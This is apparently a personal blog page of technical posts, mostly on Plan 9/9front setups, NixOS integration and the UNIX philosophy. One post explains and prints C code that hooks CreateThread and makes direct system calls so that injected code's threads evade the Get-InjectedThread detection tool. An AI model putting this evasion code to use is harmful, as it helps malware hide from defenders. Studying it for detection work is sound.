Posixcafe Who's asking

Misconceptions about the UNIX Philosophy (2024/01/05)

I recently had a discussion with a friend of mine about some talking points that Jonathan Blow made regarding the "UNIX Philosophy" during his interview on Oxide's On The Metal podcast. I'll place an excerpt of the provided transcript here (slightly edited, since there were some errors in the transcript compared to what I heard Jonathan say).

Jonathan
I'm going to throw out another stone that will get people mad at me,
but so in terms of all this complexity that needs to be collapsed,
I think everything has its time. The thing–

Bryan
God, what's next? Where are you going after that?

Jonathan
Well, the Unix philosophy for example it has been inherited by
Windows to some degree even though it's a different operating system,
right? The Unix philosophy of you have all these small programs that you
put together in two like ways, I think is wrong. It's wrong for today and
it was also picked up by plan nine as well and so-

Bryan
It's micro services, micro services are an expression of Unix philosophy,
so the Unix philosophy, I've got a complicated relationship with Unix philosophy. Jess,
I imagine you do too, where it's like, I love it, I love a pipeline, I love it when I want to
do something that is ad hoc, that is not designed to be permanent because it allows me– and you
were getting inside this earlier about Rust for video games and why maybe it's not a fit in terms
of that ability to prototype quickly, Unix philosophy great for ad hoc prototyping.

There is this idea that to be UNIX means you have multiple tiny programs talking to each other over pipes, and some even take it further to imply that this communication must be plain text. This classification is a deep misunderstanding of the ideas put forward by UNIX, and yet it is a position I see many of my peers share. I see this in how, when the UNIX philosophy is brought up in the context of modern systems, people point to microservices and say "look at that, microservices are UNIX and microservices suck!".

How did this happen?

I feel like this is a case of people confusing the implementation for the design. Missing the forest for the trees. I believe this happened because of people quoting and repeating things as mantras without context. The one I hear a lot is "Write programs that do one thing and do it well", which is attributed to Peter H. Salus in "A Quarter Century of UNIX". I also quite often see quotes from Doug McIlroy's writing in the Bell System Technical Journal, in particular from a bulleted list that Doug gives under a section titled Style:

A number of maxims have gained currency among the builders and users of the UNIX system to explain and promote
its characteristic style:

(i) Make each program do one thing well. To do a new job,
build afresh rather than complicate old programs by adding new features.

(ii) Expect the output of every program to become the input to another,
as yet unknown, program. Don't clutter output with extraneous information.
Avoid stringently columnar or binary input formats. Don't insist on interactive input.

(iii) Design and build software, even operating systems, to be tried early, ideally within weeks.
Don't hesitate to throw away the clumsy parts and rebuild them.

(iv) Use tools in preference to unskilled help to lighten a programming task, even if you have to detour
to build the tools and expect to throw some of them out after you've finished using them.

These first two sets of quotes seem to be so important that if you go to the Wikipedia page for "UNIX philosophy", they are the first two quotes given in the "Origin" section. At a surface glance these are not exactly incorrect. I am not calling either author here wrong; you can observe that UNIX as it was implemented follows these ideas. The error is when people extrapolate these implementation details out as the philosophy itself, when instead they are byproducts of applying the philosophy specifically to operating systems. The first two style rules given by Doug refer specifically to programs, a unit of organization that really only an operating system (whose primary job is managing them) would care about. Rule three starts to get a bit more abstract, specifically because it refers to software and not programs, and is something I too find to be generally good advice outside of operating systems. Continuing to rule four, we again see Doug refer to tools, not processes, and as such it is something that I also agree is generally adaptable to software at large.

Yet why aren't the last two style rules repeated more when discussing the "UNIX Philosophy"? Why do people seem to stop at things that tie the philosophy so closely to the notion of operating systems? Thinking that microservices are UNIX because they are a bunch of small programs talking to each other doesn't make sense, because microservices are an architecture for distributed systems and the notion of these small programs talking to each other is a rule for operating systems. The friction that people face comes from shoving a square peg in a round hole.

Actual UNIX Philosophy

Let us dig a bit more to see if we can find something that is a bit more abstract. A good start is the preface to "The UNIX Programming Environment" by Brian Kernighan and Rob Pike, of which the following is an excerpt:

Even though the UNIX system introduces a number of innovative programs and techniques, no
single program or idea makes it work well. Instead, what makes it effective is an approach to
programming, a philosophy of using the computer. Although the philosophy can't be written down
in a single sentence, at its heart is the idea that the power of a system comes more from
the relationships among programs than from the programs themselves. Many UNIX programs do quite
trivial tasks in isolation, but, when combined with other programs become general and useful tools.

Our goal in this book is to communicate the UNIX programming philosophy. Because the philosophy is
based on the relationships between programs, we must devote most of the space to discussions about
individual tools, but throughout run the themes of combining the programs and using programs to build
programs. To use the UNIX system and its components well, you must understand not only how to use programs,
but also how they fit into the environment.

So what happens when we abstract out those pesky operating system specific terms like "program" and "process"? What we find is that the UNIX philosophy is about composability. I'd argue the size and purpose of a program matter less than its ability to be used with others. What feels nice about using an operating system like UNIX is that you can put code together in ways not intended; the pieces fit together like LEGO bricks.

Let us revisit the topic of microservices. The issue I often see (and have experienced) is that information flows between them in a complicated manner. Data flows through UNIX pipes linearly, from one program to the next, and the entire chain is present in the command. In a distributed system with a microservice design, data flow often looks more like a complicated graph with multiple edges between nodes. We can see clearly that, by Rob and Brian's definition of UNIX design, microservices fail because they compose poorly. Every new edge to a node on the graph brings with it complicated dependencies and overhead.

Composability doesn't have to be between programs. If, for example, you are building a game or end user program, composability may mean that individual libraries or components of the overall program fit together nicely. A single program can be UNIX-like if the various individual pieces of its internals fit together well.
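As a rough illustration of composability inside a single program, here is a minimal C sketch. The Stage type and the upcase, squeeze and run names are hypothetical, made up for this example. The only point is that pieces sharing one small interface can be chained in any order, much like a pipeline.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Hypothetical interface: every stage rewrites a NUL-terminated buffer in place. */
typedef void (*Stage)(char *s);

/* Uppercase every character. */
void
upcase(char *s)
{
	for(; *s != '\0'; s++)
		*s = (char)toupper((unsigned char)*s);
}

/* Collapse runs of spaces in to a single space. */
void
squeeze(char *s)
{
	char *w = s;
	int prevspace = 0;

	for(; *s != '\0'; s++){
		if(*s == ' ' && prevspace)
			continue;
		prevspace = (*s == ' ');
		*w++ = *s;
	}
	*w = '\0';
}

/* Run each stage in order, the in-process analogue of a | b | c. */
void
run(Stage *stages, size_t n, char *s)
{
	size_t i;

	assert(stages != NULL && s != NULL);
	for(i = 0; i < n; i++)
		stages[i](s);
}
```

Calling run with an array such as { squeeze, upcase } applies both stages to a buffer. Adding a third stage does not require touching the existing two, which is the property the paragraph above is after.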

End

I want to cap this off by using an excerpt from Ken Thompson and Dennis Ritchie's paper "The UNIX Time-Sharing System", specifically a section titled "Perspective".

Three considerations which influenced the design of UNIX are visible in retrospect.

First, since we are programmers, we naturally designed the system to make it easy to write, test,
and run programs. The most important expression of our desire for programming convenience was that
the system was arranged for interactive use, even though the original version only supported one
user. We believe that a properly designed interactive system is much more productive and satisfying
to use than a “batch” system. Moreover such a system is rather easily adaptable to noninteractive
use, while the converse is not true.

Second there have always been fairly severe size constraints on the system and its software. Given
the partially antagonistic desires for reasonable efficiency and expressive power, the size
constraint has encouraged not only economy but a certain elegance of design. This may be a thinly
disguised version of the “salvation through suffering” philosophy, but in our case it worked.

Third, nearly from the start, the system was able to, and did, maintain itself. This fact is more
important than it might seem. If designers of a system are forced to use that system, they quickly
become aware of its functional and superficial deficiencies and are strongly motivated to correct
them before it is too late. Since all source programs were always available and easily modified
on-line, we were willing to revise and rewrite the system and its software when new ideas were
invented, discovered, or suggested by others.

Using 9front as a home router (2024/01/04)

When people discuss Plan 9 it is usually mentioned that Plan 9 has a truly file-oriented design, but I think it is sometimes hard to conceptualize the benefits of this from an outside perspective. To assist with this I wanted to discuss how I have my 9front box at home configured to act as my home router, and show how it's done.

My hardware setup is an old DELL OEM that I've jammed a 4 port ethernet pcie card in to. I use this for both the LAN and uplink since the on board ethernet port is not gigabit. Nothing fancy, just some hardware I had lying around.

Preface

Before we get in to the weeds here we're going to need to know our tools. In Plan 9 the kernel exposes a good deal of functionality through kernel filesystems; think stuff like Linux's /sys/. However, unlike Linux, Plan 9 exposes multiple roots for different subsystems that the user may bind(1) in to their namespace at will. These kernel devices are accessed through a path that starts with '#' and is followed by a single rune identifier. For example the IP stack is accessed via '#I' and disks (/dev/sd*) are exposed via '#S'.

Much like 9p filesystems, a "mount argument" may also be supplied when accessing these devices; this is usually used to access a specific instance of a device. For example '#l0' refers to ethernet card 0, '#l1' refers to ethernet card 1 and so on. The ip device ('#I') also allows for an integer argument to specify which IP stack you would like to access, which can be used to set up multiple disjoint IP stacks.
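To make the naming scheme concrete, here is a small C sketch that splits such a path in to its device character and mount argument. The devsplit function is hypothetical and is not how the kernel does it. It also assumes the device identifier is a single ASCII character and that the argument runs up to the first '/'.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Split a kernel device path such as "#l1" or "#I" in to its device
 * character and its optional mount argument. Simplifying assumptions:
 * the device identifier is a single ASCII character and the argument
 * ends at the first '/' (or at the end of the string).
 * Returns 0 on success, -1 if the path is not a device path or the
 * argument does not fit in spec.
 */
int
devsplit(const char *path, char *dev, char *spec, size_t nspec)
{
	size_t n;

	assert(path != NULL && dev != NULL && spec != NULL);
	if(path[0] != '#' || path[1] == '\0' || path[1] == '/')
		return -1;
	*dev = path[1];
	n = strcspn(path + 2, "/");
	if(n >= nspec)
		return -1;
	memcpy(spec, path + 2, n);
	spec[n] = '\0';
	return 0;
}
```

Under these assumptions '#l1' splits in to device 'l' with argument "1", while '#I' splits in to device 'I' with an empty argument.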

Setup

For making this router happen we'll create a /cfg/$sysname/cpurc script, which will run at startup.


# Place IP stack 1 on /net.alt, this will be our "outside" IP stack
bind '#I1' /net.alt

# Place ethernet card 0 within that outside IP stack
# This is just organizational, not binding it to the IP stack yet
bind -a '#l0' /net.alt

# Create an ethernet bridge and add it to our "inside" IP stack
bind -a '#B' /net
# Add all of our internal ports to our "inside" IP stack
bind -a '#l2' /net
bind -a '#l3' /net
bind -a '#l4' /net
# Bind the interfaces to the bridge
echo 'bind ether port1 0 /net/ether2' >/net/bridge0/ctl
echo 'bind ether port2 0 /net/ether3' >/net/bridge0/ctl
echo 'bind ether port3 0 /net/ether4' >/net/bridge0/ctl

x=/net.alt
o=/net
# Create a virtual IP interface on both the inside and outside IP stacks
# We open the clone file, and the kernel will then give us the
# id of the newly created interface.
<$x/ipifc/clone {
	# Read the new interface number
	xi=$x/ipifc/`{read}

	# Write in to the ctl file of the newly created interface to configure it
	>$xi/ctl {
		# This is a packet interface
		echo bind pkt

		# Our ip is 192.168.69.3/24 and we only allow remote connections from 192.168.69.2
		echo add 192.168.69.3 255.255.255.255 192.168.69.2

		# Route packets to others
		echo iprouting 1

		# Now create a new interface on the inside IP stack
		<$o/ipifc/clone {
			oi=$o/ipifc/`{read}
			>$oi/ctl {
				# Hook up this device to the outside IP stack device
				echo bind netdev $xi/data

				# Our ip is 192.168.69.2/24 and we only allow remote connections from 192.168.69.3
				echo add 192.168.69.2 255.255.255.0 192.168.69.3
				echo iprouting 1
			}
		}
	}
}

# Configure our route table for both the inside and outside IP stacks
# Arguments are: target mask nexthop interface(addressed by IP)
echo add 192.168.168.0 255.255.255.0 192.168.69.2 192.168.69.3 > $x/iproute
echo add 0.0.0.0 /96 192.168.69.3 192.168.69.2 > $o/iproute

# Do DHCP on the external interface. -x tells us which
# IP stack to use. -t tells us that we are doing NAT
# and to configure the route table as such. NAT is implemented
# as just a route table flag.
ip/ipconfig -x /net.alt -t ether /net.alt/ether0

# Configure a static IP on our internal interface, which will
# act as a gateway for our internal network.
ip/ipconfig ether /net/ether2 192.168.168.209 255.255.255.0

# Start dhcpd on our internal network, our DHCP range is 192.168.168.50-192.168.168.150
/bin/ip/dhcpd 192.168.168.50 100

It is worth noting that ip/ipconfig is mostly a convenience and has no magic under the hood; it itself is just talking to files in /net. This allows us to pass different /net's via -x as we like.

That's all folks. I've been using this for about a year now and haven't had any problems with it.

Further Reading

You can read more about the specific kernel devices within section 3 of the 9front manual. Some of the ones we used today: ether(3), bridge(3) and ip(3).

9front also has a network database (NDB) that is used to infer systems and their ip addresses (among other things), but it was omitted to keep the focus here. If you want to read more about it, look at ndb(6) and the wiki.

Running 9front on an emulated SGI Indy via MAME (2024/01/01)

I recently found that MAME supports running the SGI Indy while looking for ways to test some modifications I was making to the mips code in 9front. After a fair bit of elbow grease cinap and I (but mostly cinap) were able to get the old 9front indy kernel booting and running within MAME. I thought I might as well document how we set things up here. As a word of warning, this will require some decent 9front infrastructure set up already and some familiarity with things like ndb. Additionally, this system is barely usable by modern standards, so its usefulness is limited.

Baseline MAME Indy

The mainline MAME only gives the Indy 16MB of ram, which is a little tight. Thanks to some clever folks on the irixnet forums I found a patch for bumping this limit to the theoretical maximum (256MB). You can grab a prepatched repo here, or if you are using a system with nix flakes available you can use nix run github:majiru/9front-in-a-box#mame.

Next you'll need to grab the required firmware files. I used this guide to get going; some links may be dead, but some google searching of the required file names should get you some archive.org files.

Next you'll need to configure networking. MAME is a bit unique here and expects a tap named tap-mess-$UID-0. Additionally, after running once you'll need to modify $MAMEROOT/cfg/indy_4610.cfg so that the edlc device line looks like so:

<device tag=":edlc" interface="0" mac="08:00:69:12:34:56" />

Then you'll also likely need to modify the network from the in-emulation menu in MAME, which can be found by booting up the emulator, hitting ScrlLk followed by Tab, then clicking network settings and arrowing over to TAP/TUN network. This should only need to be done once, as it will change the interface= line for the edlc device. Unfortunately this specific index seems to be OS specific (it was 0 for me on linux and 2 for cinap on Windows), so it's a bit difficult to modify without the in-emulation menu. At this point you should have a working Indy with networking. I suggest perhaps booting in to IRIX (as documented in the neocities guide) and double checking this if you get stuck further on.

(editor's note: a real tap-mess indeed)

9front bits

Now for the fun bits, let's set up our 9front grid for bootp'ing this device. Let's first build the userspace and kernel:

cd /sys/src/

objtype=mips mk install

cd /sys/src/9/sgi

mk install

Next we need to configure the network booting. First add a /lib/ndb/local line to the tune of:

ip=192.168.168.214 ether=080069123456 sys=indy dom=indy.genso fs=myfs auth=myauth bootf=/mips/9indy

Then, assuming you have your ip/tftpd running and MAME set up correctly, you can boot up the Indy, click the button for maintenance mode, enter the PROM shell, then type BOOTP(); which should grab your kernel and boot right up.

Profit?

NixOS + 9Front (2023/07/21)

I, along with seemingly others, have recently discovered the NixOS linux distribution and have been having a lot of fun with it. A lot of the discussion I see on NixOS tries to answer more pragmatic questions about its use, such as its feasibility as a daily driver and the learning curve of the nix language itself. While these topics are definitely worth talking about, I feel like they don't address what I consider to be the reasons why I've been enjoying my time with it.

It's all one hackable monorepo

NixOS is entirely contained in the one NixOS/nixpkgs github repo. This design choice has made a world of difference in both how I think about using my linux system and how I am able to become an active participant.

The git repo part has some real nice aspects to it, some quick ones include:

To add a bit of narrative to that, using NixOS has been the first time where I felt like I knew where to look for figuring out how the sausage was made. I can learn and study the system, both for figuring out perhaps why something acts the way that it does or just to read to see how things click together. The fork-ability adds a lot to this as well; you are not "sitting on top of" the bespoke system setup. If you want something done differently on your system you have all the tools and access to do it in the same structured way as the OS maintainers themselves use. Having come over from arch, where each pacman -Syu was a hail mary of broken mesa or weird xwayland bugs, this has felt quite refreshing.

I find these benefits to be common for any sort of OS project that prefers to keep everything in one monorepo, with 9Front being perhaps the example I am most fond of, and an honorable mention to the BSDs in this regard. I could award full points if parts of ports didn't feel like they were about to atrophy.

Talk's cheap

It sure is. To "walk the walk" on my feelings about this, and for some of my own fun I began to slowly port over utilities that I, along with others in the 9front space, have built for use on linux. The goal being to see how nicely I could integrate my NixOS install in to my existing 9Front system.

I started first with drawterm, the "9front rdp" so to say. Nixpkgs had it already but there were a couple of issues: the audio didn't work and there was no package for building the wayland graphical backend variant. I read some docs, learned some nix, and got that taken care of. Once it had been merged I had a desire to use it within my existing setup but didn't quite want to switch over to the unstable channel. Instead I just cherry-picked the commit on to my own copy of the nixos-23.05 release branch. With flakes this was as easy as just changing the nixpkgs input to point to my own github repo. (It's worth noting that there is a process for officially backporting to the release branch.)

With that done I moved on to adding my own new package, tlsclient. Tlsclient has become a bit of a swiss army knife for 9front related authentication tools on linux and as such includes a PAM module for authenticating against a 9front authentication server. Now this is something that I never really had packaged in the past; having some script to automatically modify and otherwise mess with people's pam.d/ never felt right to me. However, with the entirety of the pam config being generated as part of nixpkgs, it was quite easy to just add in the NixOS module configuration options and the corresponding PAM configuration generation based on those. The result is quite nice to use I think. Here is the related excerpt from my configuration.nix:


security.pam.dp9ik = {
    enable = true;
    authserver = "flan";
};

I continued then with writing and integrating a new utility from tlsclient, a "mount helper", that wraps the linux kernel's native 9p filesystem in a dp9ik authenticated tls tunnel. After packaging this up I was able to add the following to my configuration.nix as well:


system.fsPackages = [ pkgs._9ptls ];
fileSystems."/n/flan" = {
    device = "flan";
    fsType = "9ptls";
    options = [
      "auth=flan"
      "port=9090"
      "user=moody"
      "uid=moody"
      "nofail"
    ];
};

And just like that I had my NixOS box mounting and authenticating like a 9front machine, all without too much fuss. The only logical next step was to make it look like a 9front machine as well, to which I think I did a pretty convincing job:

Wrap up

I had some good fun, was able to port over my existing linux tools without much fuss, and even got them upstreamed for once. I will likely continue to use NixOS in to the near future as my linux of choice.

If you want to look at my nix stuff you can find my personal nixpkgs development branch here, and my configurations and overlays here.

Evading Get-InjectedThread using API hooking (2021/01/27)

Get-InjectedThread is a PowerShell utility that allows the user to look through running processes and find threads which seem to be the spawn of code that has been injected in to memory one way or another. It accomplishes this by checking running threads to see if their start address is on a page marked as MEM_IMAGE. It does the querying using the VirtualQuery function in kernel32.dll, which itself is a small wrapper around the NtQueryVirtualMemory system call.

For evading this, we simply need to ensure that the start address that gets passed to CreateThread points to a valid MEM_IMAGE mapped area of virtual memory. Now this is easy to do for smaller programs in which you can hand write a shim and use that in place of CreateThread, but this gets a bit harder when the goal is a more general purpose way of side loading.

However there is a fairly simple way around this problem by making use of API hooking and direct system calls. As long as the injector and the injected code continue to reside within the same process, it is possible for the injector to hook API calls within the process and through that patch CreateThread() to point to a shim function within the injector's virtual memory when the call is made by the injected code. This gives the injected code free rein to call CreateThread while still skirting detection from Get-InjectedThread. The following example code illustrates one way to achieve this:


struct {
	HANDLE *mutex;
	LPTHREAD_START_ROUTINE lpStartAddress;
	LPVOID lpParamater;
	BOOL launched;
} BouncerInfo;

void
SetupPivot(void)
{
	BouncerInfo.mutex = CreateMutexA(NULL, FALSE, NULL);
	BouncerInfo.launched = TRUE;
}


void __stdcall
ThreadPivot(void *param)
{
	WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	LPTHREAD_START_ROUTINE f = BouncerInfo.lpStartAddress;
	LPVOID p = BouncerInfo.lpParamater;
	BouncerInfo.launched = TRUE;
	ReleaseMutex(BouncerInfo.mutex);
	printf("[*] Pivoting to passed function\n");
	f(p);
}

//Function that can be injected over CreateThread from kernel32.dll
HANDLE __stdcall
HookedCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParamater, DWORD dwCreationFlags, LPDWORD lpThreadId)
{
	HANDLE ThreadHandle = NULL;
	NTSTATUS res;
	WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	//It's possible that we get two CreateThread calls before a pivot
	//occurs, this is a bad way of dealing with it but it shouldn't happen often
	while(BouncerInfo.launched == FALSE){
		printf("[!] Double entry detected, spin locking...\n");
		ReleaseMutex(BouncerInfo.mutex);
		WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	}
	BouncerInfo.lpStartAddress = lpStartAddress;
	BouncerInfo.lpParamater = lpParamater;
	BouncerInfo.launched = FALSE;
	//Direct system call shim function
	res = NtCreateThreadEx10(&ThreadHandle, GENERIC_ALL, NULL, GetCurrentProcess(), ThreadPivot, lpParamater, FALSE, 0, 0, 0, NULL);
	ReleaseMutex(BouncerInfo.mutex);
	if(res != STATUS_SUCCESS){
		printf("[!] HookedCreateThread error: %lx\n", res);
		return NULL;
	}
	return ThreadHandle;
}

The code is a bit complex due to the asynchronous nature of CreateThread. We first set up a global struct that will store the last set of arguments that were given to our hook, as well as a mutex to lock our variables between our threads. We also use a boolean flag variable within the struct to make sure that a pivot for a given address happens before another call to CreateThread is made and overwrites the start address. This is needed as control can return to the caller of CreateThread before the new thread has a chance to run, which can result in multiple calls happening before a pivot can be made on the original address.

Doing this will cause new threads to have their start address set to ThreadPivot, which is located in the MEM_IMAGE flagged area of memory from our injector.

For information on hooking and direct system calls I have code snippets for each available.

9chroot (2020/06/16)

I've recently set up and automated a process for building nightly ISO files for 9front, mostly for use in installing virtual machines that I would like to be up to date but don't expect to live long. One thing I wanted for the build machine was to use a dedicated disk for building and keep a clean system to build the ISO files from. However it would also be nice to have the build machine using my existing file server such that it could do internal builds as well. To solve this I decided to see if it was possible to have specific programs on a cpu server run under a different root filesystem.

First up was getting the machine alive and on 9front. Putting a disk in the machine and running through the typical install procedure left me with a terminal using a local hjfs disk as its root. To add it in to my existing network I configured plan9.ini properly and initialized nvram to make this new machine a standard cpu node for my network.

However using this for building the ISO files left me with three problems:

To solve this I figured I could make use of the existing clean hjfs filesystem on the disk for building. The first step of this is starting hjfs on system boot.

#start hjfs on boot and post to /srv/hjfs
echo 'hjfs -f /dev/sdE2/fs -n hjfs -m 2011' > /cfg/$sysname/cpustart

#bind it in by default when I rcpu in
echo 'bind -c #s/hjfs /n/hjfs' > /cfg/$sysname/namespace

Next we construct a namespace file for the build script to use.

# Replace the use of '#s/boot' to instead use the hjfs instance
sed 's/boot/hjfs/' /lib/namespace > /lib/namespace.build

# Test that everything works by changing in to the new namespace
auth/newns -n /lib/namespace.build

This leaves us with what looks like a typical 'chroot' environment that can be invoked for specific programs. With this I can set something up in the cron file of my auth server like this:

40 5 * * * una auth/newns -n /lib/namespace.build /usr/glenda/bin/rc/nightly > /sys/log/build

This will run the nightly script every morning under the new namespace while saving the output to my normal cwfs filesystem. It's worth noting that if you plan to have this namespace be usable for the none user then /srv/hjfs must be read-writable by the none user. Adding a chmod o+rw /srv/hjfs to /cfg/$sysname/cpustart, after hjfs is started, will fix this issue.

9front Bare Bones Kernel (2020/05/05)

I have recently been interested in reading and understanding the processes of kernel development. In that effort I have been spending some time reading the OSDev wiki as well as this fantastic set of blog posts on writing a kernel in rust. However I quickly ran in to two problems:

So I thought it might be worthwhile to take a peek at getting a barebones kernel set up using the common tools that are available on the OS that I do most of my development in, 9front. I set out to first learn how 9front manages its kernel, and then see if I could strip out just the minimum to get myself a little "hello world".

Knowing where to look

Let's start by looking at how 9front organizes its kernel code. All of the kernels are located in /sys/src/9/$objtype/ with port referring to portable code between them. For our purposes we're only going to look at the amd64 kernel. There are three files that are good to look at first:

Also worth noting are a couple of additional directories:

Start putting stuff together

Copying over the l.s file we see tons of stuff that we won't need, so let's trim it down a bit. Reading it quickly we find that we call our main function in _start64v, so let's delete everything after that. We can also see that l.s requires a mem.h, so let's grab that as well. Then let's write our own very tiny kern.c with a void main(void) entry point. For now simply entering an infinite loop will suffice.

#include <u.h>

u32int MemMin; //Filled by l.s, thus the symbol must be somewhere

void main(void) { for(;;); }

Now let's get each of these compiled/assembled.

; 6c kern.c && 6a l.s

Now if we check the 9pc64 mkfile for how to link them we see something a bit out of the norm. First we see a KTZERO variable declared and then it being passed to the linker through the -T flag.

Looking at the man page for the linker, we see that the -T flag tells the linker where to start placing the .TEXT section for the binary. To understand why this is needed, let's remind ourselves of what goes on in the average boot (in relation to our kernel).

When we first get to our kernel we have not set up virtual memory, so our first sets of jumps and addressing must use the physical addresses. Looking at mem.h we can see that KZERO (kernel zero) is set to 0xffffffff80000000, so this must be where 9boot puts the start of our kernel binary. However, the start of the binary is not the start of executable code, that would be the .TEXT section. So we must have a common definition of where our executable code starts between our linker and our l.s code. This allows l.s to tell 9boot where exactly in physical memory to jump to.

To accomplish this we pick a common starting point, define it in our source code, and make sure to pass it to the linker so things line up. So now that we know what is going on, let's link our kernel:

6l -o kern -T0xffffffff80110000 -l l.6 kern.6

It's worth noting that l.6 must come first or else our dance to get the .TEXT section aligned will be pointless, as kern.6 will be placed first in to the section.
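To see how the -T value relates to KZERO, here is a small worked calculation in C. The constants are the two values quoted above. The paddr helper is hypothetical, and it rests on the assumption that kernel virtual addresses map to physical memory at a fixed offset of KZERO.

```c
#include <assert.h>
#include <stdint.h>

/* Values taken from the text: KZERO from mem.h, KTZERO from the -T flag. */
#define KZERO	0xffffffff80000000ULL
#define KTZERO	0xffffffff80110000ULL

/*
 * Assumption for this sketch: kernel virtual addresses map to physical
 * memory by a fixed offset of KZERO, so subtracting it yields the
 * physical address.
 */
uint64_t
paddr(uint64_t va)
{
	assert(va >= KZERO);
	return va - KZERO;
}
```

Under that assumption paddr(KTZERO) comes out to 0x110000, which is 1 MiB plus 64 KiB in to physical memory.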

Now let's verify that we indeed set things up right by using file(1). The output should look like:

kern: amd64 plan 9 boot image

Booting our new kernel

We have one more step before we can actually get our fresh kernel booted in something like QEMU. We need to create a cdrom iso image that contains both our kernel as well as 9boot. For this we will take a look at the existing script for iso generation on 9front: /sys/lib/dist/mkfile.

Let's start by creating a new plan9.ini for 9boot to point to our new kernel:

echo 'bootfile=/amd64/9pc64' > plan9.ini

We'll also want a local copy of /sys/lib/sysconfig/proto/9bootproto so that we can add our kernel path to it.

Now that we have those, let's create our iso using disk/mk9660 like so:

; @{rfork n
# Setup our root
bind /root /n/src9
bind plan9.ini /n/src9/cfg/plan9.ini
bind kern /n/src9/amd64/9pc64
disk/mk9660 -c9j -B 386/9bootiso \
-p 9bootproto \
-s /n/src9 -v 'Plan 9 BareBones' kern.iso
}

With that, you should have a bootable iso image fit for use in something like QEMU.

Source

The source code is available on my github. It adds a small print message in kern.c as well as a mkfile based on what is shown here.

Using fossil and venti as auxiliary storage on plan9. (2019/12/30)

For those who are not familiar, venti and fossil are disk file systems for the plan9 operating system. Venti acts as append-only storage of data blocks, and fossil is a local copy of these blocks represented as a traditional file system. The most notable advantages of this pairing are that venti has aggressive dedup and is append only. Data is addressed by its sha1 hash, and can never be deleted once stored. Fossil can sync data back to venti, generating a 'vac'. This hash is a key to fossil's 'window' into the venti data, allowing it to construct local filesystem trees out of it. This means that, essentially, venti handles all of the actual storage of the files, and vacs act as keys into snapshots of that data that fossil can work with. Perhaps the most interesting part about fossil is that it is 'lazy loaded', meaning that data is pulled from venti only when absolutely necessary, which makes it possible to create very small fossils for viewing previous vacs. Recently, I thought this system would make a great auxiliary addition to my current plan9 setup. My plan was to store my own and others' source code (really just my $home/src) in it, both to test it and to see if the benefits were worth it. This post will walk through my process of creating the configuration. This was done on 9ants5, but could be done on a normal 9front release if desired.
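
To make the "addressed by its sha1 hash, append only, dedup'd" idea concrete, here is a toy model in Python. It is a sketch under my own assumptions and not how venti lays out arenas or its index; the class and method names are made up for illustration. The only thing borrowed from venti is the term "score" for the sha1 of a block.

```python
import hashlib


class BlockStore:
    """Toy append-only, content-addressed block store (not venti's real format)."""

    def __init__(self):
        self._log = []      # append-only list of stored blocks
        self._index = {}    # sha1 hex digest (score) -> position in the log

    def write(self, block: bytes) -> str:
        score = hashlib.sha1(block).hexdigest()
        if score not in self._index:      # dedup: identical data is stored once
            self._index[score] = len(self._log)
            self._log.append(block)
        return score

    def read(self, score: str) -> bytes:
        return self._log[self._index[score]]

    def __len__(self):
        return len(self._log)


store = BlockStore()
a = store.write(b"hello, venti")
b = store.write(b"hello, venti")   # same content, so same address
c = store.write(b"something else")

print(a == b)         # True
print(len(store))     # 2
print(store.read(a))  # b'hello, venti'
```

Note that there is deliberately no delete method: once a block is in the log, the only operations are writing more blocks and reading existing ones back by score.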

First, though, some history and thoughts on fossil and venti themselves. When used for a rootfs, it allows for multiple fossil installs based around one central venti. Since the information is dedup'd, one fossil and 50 fossils use the same space on the venti server. This works well with the traditional idea of 9 being a 'grid' system, making the addition of new machines practically free. The other great part is the snapshot capabilities: the snapshots themselves are ephemeral, and you can quite easily create a new fossil pointing to an existing snapshot. This would allow you, for example, to spin up a new machine/VM with a snapshot of last month's code to test for comparisons. Because the whole system is snapshotted, you can test with the context of the entire system. This is in contrast to the idea of using a modern VCS to manage individual projects, where it can be hard to truly rewind infrastructure to a specific point in time. Fossil even allows for trees: if you want to test a slight deviation you can use a base vac and create separate branches of modifications, each getting their own new vac. With some simple tooling, this could be used to build some very efficient version control systems (admittedly, this currently does not exist to my knowledge). As for history, fossil was the original plan9 file system when it was first open sourced by Bell Labs. However, a nasty bug plagued it until 2012, giving it a bad impression and leading to an eventual migration away from it. Since then a lot of experimentation and support has been done by the creator of 9ants, mycroftiv. One notable project is his 'spawngrid' system, which leverages ramfossils for on-demand containers.
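
The sharing between snapshots and branches can be sketched the same way. The Python below is a toy model, not the real vac or venti format: the JSON directory block, the function names and the sample files are all my own inventions for illustration. The root score returned by snapshot() plays the role of a vac.

```python
import hashlib
import json

blocks = {}  # score -> bytes; stands in for the shared venti server


def put(data: bytes) -> str:
    score = hashlib.sha1(data).hexdigest()
    blocks.setdefault(score, data)   # identical blocks are stored once
    return score


def snapshot(tree: dict) -> str:
    """Store every file, then a directory block mapping name -> score.
    The returned root score acts like a vac in this sketch."""
    listing = {name: put(content) for name, content in tree.items()}
    return put(json.dumps(listing, sort_keys=True).encode())


def checkout(root: str) -> dict:
    """Rebuild a tree from nothing but its root score."""
    listing = json.loads(blocks[root])
    return {name: blocks[score] for name, score in listing.items()}


base = {"kern.c": b"print hello", "mkfile": b"rules"}
base_root = snapshot(base)
count_after_base = len(blocks)       # 2 file blocks + 1 directory block

# A branch that changes one file: only the changed file and the new
# directory block are added; mkfile is shared with the base snapshot.
branch = checkout(base_root)
branch["kern.c"] = b"print goodbye"
branch_root = snapshot(branch)

print(count_after_base)              # 3
print(len(blocks))                   # 5
print(checkout(base_root) == base)   # True
```

Snapshotting the unchanged base tree again, whether once or 50 times, adds no new blocks, which is the sense in which extra fossils on the same data come for free.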

For getting fossil+venti up and running, pop open your disk (or file) in disk/edisk and create one large "plan9" partition. Then we need to divvy this partition up into our two venti partitions. disk/prep -a arenas -a isect /dev/sdE0/plan9 should do just fine. Next we need to write a config file for venti. The following should do:

; cat >/tmp/venti.conf <<.
index main
arenas /dev/sdE0/arenas
isect /dev/sdE0/isect
mem 32m
bcmem 48m
icmem 64m
httpaddr tcp!*!8000
addr tcp!*!17034
.

This points venti to our partitions and tells it to start listening and accept connections from any origin. Now to actually format the partitions and write our config to venti.

; venti/fmtarenas arenas /dev/sdE0/arenas
; venti/fmtisect isect /dev/sdE0/isect
